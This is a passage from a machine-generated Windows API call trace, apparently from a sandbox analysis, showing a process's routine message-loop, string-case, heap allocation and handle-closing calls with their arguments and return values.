wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.400] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.400] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0188.400] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.401] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0188.401] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.401] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.401] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.401] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.401] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.401] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.401] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.401] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.401] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.401] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.401] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.401] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.428] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.428] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.428] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.428] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0188.428] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.428] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0188.428] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.428] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.428] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.428] CryptReleaseContext (hProv=0xaa3868, dwFlags=0x0) returned 1 [0188.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0188.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0188.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0188.429] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0188.429] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.429] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0188.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.429] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.429] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.429] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0188.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.430] FreeLibrary (hLibModule=0x74d40000) returned 1 [0188.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0188.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.430] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.430] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0188.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.430] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0188.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0188.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0188.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0188.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0188.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0188.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0188.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0188.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0188.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.431] CloseHandle (hObject=0x268) returned 1 [0188.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0188.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0188.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0188.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.432] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0188.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0188.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0188.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0188.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0188.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.434] CloseHandle (hObject=0x294) returned 1 [0188.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0188.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0188.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.443] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0188.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0188.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0188.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0188.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0188.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0188.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0188.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0188.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0188.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0188.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0188.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0188.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0188.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0188.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0188.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0188.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0188.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0188.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0188.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0188.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0188.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0188.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0188.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0188.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0188.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0188.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0188.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0188.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0188.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0188.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0188.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0188.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0188.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 